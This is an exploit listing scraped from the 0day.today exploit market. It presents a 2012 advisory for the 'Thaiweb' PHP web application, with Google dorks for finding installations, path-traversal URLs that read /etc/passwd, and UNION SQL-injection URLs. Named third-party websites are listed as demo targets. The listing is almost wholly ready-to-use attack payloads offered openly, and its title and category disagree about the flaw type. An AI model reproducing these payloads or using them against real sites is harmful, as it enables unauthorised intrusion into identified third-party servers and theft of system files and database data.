[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Thaiweb <= Remote File Inclusion / Sql Injection Vulnerability

Author
GoLd_M
Risk
[
Security Risk High
]
0day-ID
0day-ID-20014
Category
web applications
Date add
20-12-2012
Platform
php
# Exploit Title: Thaiweb <= Remote File Inclusion Vulnerability
# Date: 19/12/2012
# Author: GoLd_M (Libyan) Page FaceBook (http://www.facebook.com/pages/وَذَكِّـــرْ/337878286310383)
# Category:: Local File Disclosure Vulnerability
# Google Dork: intext:powered by Thaiweb. inurl:index.php?page=board.php 
# Ex :[Thaiweb]/index.php?page=../../../../../../../../../../../../../etc/passwd
# Demo:
# 01 :http://gift.in.th/index.php?page=../../../../../../../../../../../../../etc/passwd
# 02 :http://www.keytasin.com/index.php?page=../../../../../../../../../../../../../etc/passwd
# 03 :http://www.readywebthai.com/index.php?page=../../../../../../../../../../../../../etc/passwd

# Google Dork: intext:powered by Thaiweb. inurl:index.php?page=board.php 
# Ex :[Thaiweb]/index.php?page=boardque.php&bod_id=4'
# Demo:
# 01 :http://www.keytasin.com//index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# 02 :http://www.autopartnerthailand.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# 03 :http://gift.in.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--

#  0day.today [2024-07-07]  #